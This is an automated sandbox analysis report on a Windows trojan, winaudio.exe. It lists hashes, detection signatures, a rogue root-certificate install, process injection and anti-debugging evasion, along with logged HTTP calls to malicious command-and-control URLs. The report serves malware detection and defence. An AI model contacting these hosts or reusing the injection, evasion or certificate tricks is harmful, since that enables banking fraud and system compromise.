Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
winaudio.exe

Overview

General Information

Sample Name:winaudio.exe
Analysis ID:794053
MD5:d2367ad6988bb88f1b03cc7352f9696a
SHA1:a5e4f6ed449af51d5d44fb6300bf87549ecdaced
SHA256:0c0a0efd7f2e4a27ddf26e5549d164aa8dc7fd570a4bd41daf07891b2a0b59af
Tags:exetrojan
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Registers a new ROOT certificate
Installs new ROOT certificates
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Contains functionality to inject threads in other processes
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • winaudio.exe (PID: 4820 cmdline: C:\Users\user\Desktop\winaudio.exe MD5: D2367AD6988BB88F1B03CC7352F9696A)
    • conhost.exe (PID: 688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: winaudio.exeReversingLabs: Detection: 66%
Source: winaudio.exeVirustotal: Detection: 77%Perma Link
Antivirus / Scanner detection for submitted sample
Source: winaudio.exeAvira: detected
Antivirus detection for URL or domain
Source: http://41ku.cn:10100/plusxyzszssxyzsAvira URL Cloud: Label: malware
Source: http://8awang.com:10100/plusxyzsAvira URL Cloud: Label: malware
Source: http://41ku.cn:10100/plusxyzs5B7C84755D8041139A7AEBA6F4E5912F.datAvira URL Cloud: Label: malware
Source: http://41ku.cn:10100/plusxyzsAvira URL Cloud: Label: malware
Source: http://8awang.com:10100/plusxyzsxxx.xxxxxxxxxx.xxx%02X-%02X-%02X-%02X-%02X-%02Xja003server.crtSeDebuAvira URL Cloud: Label: malware
Source: http://41ku.cnAvira URL Cloud: Label: malware
Source: http://41ku.cn:10100/dfghbAvira URL Cloud: Label: malware
Source: http://63634.top:8081/kodedcAvira URL Cloud: Label: malware
Source: http://63634.top:8081/kodedAvira URL Cloud: Label: malware
Machine Learning detection for sample
Source: winaudio.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_0037BD80 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MD5Init,MD5Update,MD5Final,FreeLibrary,0_2_0037BD80
Source: winaudio.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 79.133.177.216:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 79.133.177.211:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 79.133.177.214:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 79.133.177.218:443 -> 192.168.2.3:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 79.133.177.215:443 -> 192.168.2.3:49719 version: TLS 1.2
Source: winaudio.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_0038F8BD FindFirstFileExA,0_2_0038F8BD
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D6370 GetProcessImageFileNameA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,QueryDosDeviceA,QueryDosDeviceA,GetLastError,QueryDosDeviceA,0_2_002D6370
Source: C:\Users\user\Desktop\winaudio.exeCode function: 4x nop then movd mm0, dword ptr [edx]0_2_002BC770

Networking

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49712
Source: Joe Sandbox ViewJA3 fingerprint: fd80fa9c6120cdeea8520510f3c644ac
Source: global trafficHTTP traffic detected: GET /plusxyzs HTTP/1.1Host: 41ku.cn:10100
Source: global trafficHTTP traffic detected: GET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: global trafficHTTP traffic detected: GET /tieba/pic/item/8435e5dde71190ef447aee8bc11b9d16fcfa60e4.jpg HTTP/1.1Host:imgsrc.baidu.comConnection:close
Source: global trafficHTTP traffic detected: GET /plusxyzs HTTP/1.1Host: 41ku.cn:10100
Source: global trafficHTTP traffic detected: GET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: global trafficHTTP traffic detected: GET /tieba/pic/item/0e2442a7d933c89543ffe42fde1373f0830200e4.jpg HTTP/1.1Host:imgsrc.baidu.comConnection:close
Source: global trafficHTTP traffic detected: GET /plusxyzs HTTP/1.1Host: 41ku.cn:10100
Source: global trafficHTTP traffic detected: GET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: global trafficHTTP traffic detected: GET /tieba/pic/item/314e251f95cad1c8c61b8073703e6709c83d51c5.jpg HTTP/1.1Host:imgsrc.baidu.comConnection:close
Source: global trafficHTTP traffic detected: GET /plusxyzs HTTP/1.1Host: 41ku.cn:10100
Source: global trafficHTTP traffic detected: GET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: global trafficHTTP traffic detected: GET /bjh/72d383e033c22c163fbd95f76ba384b3.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: Joe Sandbox ViewIP Address: 103.224.212.220 103.224.212.220
Source: Joe Sandbox ViewIP Address: 103.224.212.220 103.224.212.220
Source: global trafficTCP traffic: 192.168.2.3:49703 -> 103.224.212.220:10100
Source: global trafficTCP traffic: 192.168.2.3:49705 -> 103.86.67.66:10100
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: winaudio.exe, 00000000.00000002.508867059.0000000000F69000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://41ku.cn
Source: winaudio.exe, 00000000.00000002.508867059.0000000000F69000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://41ku.cn10100plusxyz
Source: winaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://41ku.cn:10100/dfghb
Source: winaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmp, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://41ku.cn:10100/plusxyzs
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://41ku.cn:10100/plusxyzs5B7C84755D8041139A7AEBA6F4E5912F.dat
Source: winaudio.exe, 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://41ku.cn:10100/plusxyzszssxyzs
Source: winaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://63634.top:8081/koded
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://63634.top:8081/kodedc
Source: winaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://8awang.com:10100/plusxyzs
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://8awang.com:10100/plusxyzsxxx.xxxxxxxxxx.xxx%02X-%02X-%02X-%02X-%02X-%02Xja003server.crtSeDebu
Source: winaudio.exe, 00000000.00000003.290091021.0000000003BC0000.00000004.00000020.00020000.00000000.sdmp, winaudio.exe, 00000000.00000002.509882233.0000000003C11000.00000004.00000020.00020000.00000000.sdmp, winaudio.exe, 00000000.00000002.509614194.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, winaudio.exe, 00000000.00000002.509809696.0000000003BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: winaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://gmt.yunliao8.com:10100/plusxyzs
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://gmt.yunliao8.com:10100/plusxyzsCreateRemoteThreadhttps11.jpgX
Source: winaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://wukong.cn:10010/feazh
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://wukong.cn:10010/feazhb
Source: winaudio.exe, 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
Source: winaudio.exe, 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.127.0.0.1TopLevelExceptionFilter
Source: unknownHTTP traffic detected: POST /apiplay/H_S_Timing/report HTTP/1.1Connection:closeAccept-Language:utf-8Content-Length:112Content-Type:application/octet-stream charset=utf-8host:41ku.cnUser-Agent:Mozilla/5.0Data Raw: 57 15 d6 b9 26 3b 1c 36 4e 07 7d 53 2b 37 48 bd c3 54 2b ab 6b e5 eb 15 5d a3 bc 98 95 2f 34 c0 df 46 82 82 a1 fd 0e fc a6 d5 ea d7 4e 79 f8 8f 1d c3 9e 3b 55 a6 e1 a7 a1 d5 61 0e 65 9e 37 fc 79 0b dc 08 34 63 af 93 14 82 3a af ca c0 15 cb 4e fb 14 13 ce d4 82 4a be ee a1 f9 a5 0b e5 2e e2 40 ec b7 5d 8b 94 8d af fe 2e c6 f6 04 a6 3e Data Ascii: W&;6N}S+7HT+k]/4FNy;Uae7y4c:NJ.@].>
Source: unknownDNS traffic detected: queries for: gmt.yunliao8.com
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_0037B080 InternetOpenA,InternetOpenUrlA,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_0037B080
Source: global trafficHTTP traffic detected: GET /plusxyzs HTTP/1.1Host: 41ku.cn:10100
Source: global trafficHTTP traffic detected: GET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: global trafficHTTP traffic detected: GET /tieba/pic/item/8435e5dde71190ef447aee8bc11b9d16fcfa60e4.jpg HTTP/1.1Host:imgsrc.baidu.comConnection:close
Source: global trafficHTTP traffic detected: GET /plusxyzs HTTP/1.1Host: 41ku.cn:10100
Source: global trafficHTTP traffic detected: GET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: global trafficHTTP traffic detected: GET /tieba/pic/item/0e2442a7d933c89543ffe42fde1373f0830200e4.jpg HTTP/1.1Host:imgsrc.baidu.comConnection:close
Source: global trafficHTTP traffic detected: GET /plusxyzs HTTP/1.1Host: 41ku.cn:10100
Source: global trafficHTTP traffic detected: GET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: global trafficHTTP traffic detected: GET /tieba/pic/item/314e251f95cad1c8c61b8073703e6709c83d51c5.jpg HTTP/1.1Host:imgsrc.baidu.comConnection:close
Source: global trafficHTTP traffic detected: GET /plusxyzs HTTP/1.1Host: 41ku.cn:10100
Source: global trafficHTTP traffic detected: GET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: global trafficHTTP traffic detected: GET /bjh/72d383e033c22c163fbd95f76ba384b3.jpeg HTTP/1.1Host:pic.rmb.bdstatic.comConnection:close
Source: unknownHTTPS traffic detected: 79.133.177.216:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 79.133.177.211:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 79.133.177.214:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 79.133.177.218:443 -> 192.168.2.3:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 79.133.177.215:443 -> 192.168.2.3:49719 version: TLS 1.2

E-Banking Fraud

barindex
Registers a new ROOT certificate
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002CF8B0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CertCreateCertificateContext,GetLastError,FreeLibrary,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,GetLastError,GetLastError,FreeLibrary,0_2_002CF8B0
Source: winaudio.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D72000_2_002D7200
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_003464200_2_00346420
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002DB4A00_2_002DB4A0
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D36100_2_002D3610
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D77600_2_002D7760
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002DAC900_2_002DAC90
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002DDC900_2_002DDC90
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002FC0200_2_002FC020
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_003891800_2_00389180
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002B321D0_2_002B321D
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D52100_2_002D5210
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_003823430_2_00382343
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002F64B00_2_002F64B0
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_003825720_2_00382572
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_003725800_2_00372580
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002F05E00_2_002F05E0
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002CA5C00_2_002CA5C0
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_0039762F0_2_0039762F
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D28600_2_002D2860
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_003258600_2_00325860
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002BD8C00_2_002BD8C0
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00324AD00_2_00324AD0
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002CAB500_2_002CAB50
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D3C000_2_002D3C00
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_0037CCB00_2_0037CCB0
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00358F400_2_00358F40
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00393FF60_2_00393FF6
Source: C:\Users\user\Desktop\winaudio.exeCode function: String function: 002ECF40 appears 48 times
Source: C:\Users\user\Desktop\winaudio.exeCode function: String function: 0030C520 appears 47 times
Source: C:\Users\user\Desktop\winaudio.exeCode function: String function: 00397C10 appears 134 times
Source: C:\Users\user\Desktop\winaudio.exeCode function: String function: 002E1020 appears 38 times
Source: C:\Users\user\Desktop\winaudio.exeCode function: String function: 002ECAF0 appears 76 times
Source: winaudio.exeBinary or memory string: OriginalFilename vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\080904b0\OriginalFilename vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\080904b0\OriginalFilenamexeX vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\080904b0\OriginalFilenamem vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\080904b0\OriginalFilenamexe vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\040904b0\OriginalFilename vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\040904b0\OriginalFilenamexe vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\040904b0\OriginalFilename, vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\040904b0\OriginalFilename' vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\040904b0\OriginalFilename> vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509809696.0000000003BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHxTsr.exeL vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: CertAddCertificateContextToStoreCertOpenStoreCertCloseStoreCertFreeCertificateContextcrypt32.dll201225024508Zwww.2345.com251225024508Z127.0.0.1OriginalFilenameUnmapViewOfFilec:\windows\temp\winaudio.dllWindowTagMapViewOfFileSoftware\Licenses\VarFileInfo\TranslationKernel32.dllConsoleOpenFileMappingA*.net.cnVirtualFreeExhttps22.ttfGET LoadLibraryAhttp://41ku.cn:10100/plusxyzs5B7C84755D8041139A7AEBA6F4E5912F.dat*.com.cnserver.derserver.key20210720RefererSOFTWARE\GMPROT\http://8awang.com:10100/plusxyzsxxx.xxxxxxxxxx.xxx%02X-%02X-%02X-%02X-%02X-%02Xja003server.crtSeDebugPrivilege\StringFileInfo\OpenProcessja002CreateFileMappingA/apiplay/Cept_Sp/reportVirtualAllocEx%s,%02X-%02X-%02X-%02X-%02X-%02X/apiplay/H_S_Timing/report{Z3CD-FA87-B5E6-0SYI}Process32NextPOST comfrom client requestFlushViewOfFile.cnCreateToolhelp32SnapshotGlobal\55644A24E6234CD6B989BEAA7D8725B0Process32FirstWaitForSingleObject HTTPnet{abababab-baba-abab-baba-ecf4bb862ded}vmware24A.datfrom server responsesi-2n*8o_5brl-kq30ok.net.cnWriteProcessMemoryIsWow64ProcessHostDNS.%d:*.%s,DNS.%d:%s,ja001C:\Windows\Temp\%shttp://gmt.yunliao8.com:10100/plusxyzsCreateRemoteThreadhttps11.jpgX vs winaudio.exe
Source: winaudio.exe, 00000000.00000002.509614194.0000000003B2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONHOST.EXE.MUIj% vs winaudio.exe
Source: winaudio.exeReversingLabs: Detection: 66%
Source: winaudio.exeVirustotal: Detection: 77%
Source: C:\Users\user\Desktop\winaudio.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\winaudio.exe C:\Users\user\Desktop\winaudio.exe
Source: C:\Users\user\Desktop\winaudio.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\winaudio.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D7140 LookupPrivilegeValueA,AdjustTokenPrivileges,0_2_002D7140
Source: C:\Users\user\Desktop\winaudio.exeFile created: C:\Windows\Temp\5B7C84755D8041139A7AEBA6F4E5912F.datJump to behavior
Source: classification engineClassification label: mal84.bank.troj.evad.winEXE@2/2@20/14
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D7200 CreateToolhelp32Snapshot,Process32First,CloseHandle,OpenProcess,K32GetModuleFileNameExA,CloseHandle,Process32Next,CloseHandle,0_2_002D7200
Source: C:\Users\user\Desktop\winaudio.exeMutant created: \Sessions\1\BaseNamedObjects\winaudio
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:688:120:WilError_01
Source: winaudio.exeString found in binary or memory: id-cmc-addExtensions
Source: winaudio.exeString found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: winaudio.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002E1066 push ecx; ret 0_2_002E1079
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002B2390 push 89084589h; iretd 0_2_002B2395
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00346420 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00346420
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Installs new ROOT certificates
Source: C:\Users\user\Desktop\winaudio.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6BA5FA30EB8FD8AD3C8346C2B17A8D8B31733895 BlobJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 10100
Source: unknownNetwork traffic detected: HTTP traffic on port 10100 -> 49712
Source: C:\Users\user\Desktop\winaudio.exeKey value created or modified: HKEY_CURRENT_USER\Software\Licenses {Z3CD-FA87-B5E6-0SYI}Jump to behavior
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00346420 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00346420
Source: C:\Users\user\Desktop\winaudio.exe TID: 1500Thread sleep time: -51900s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
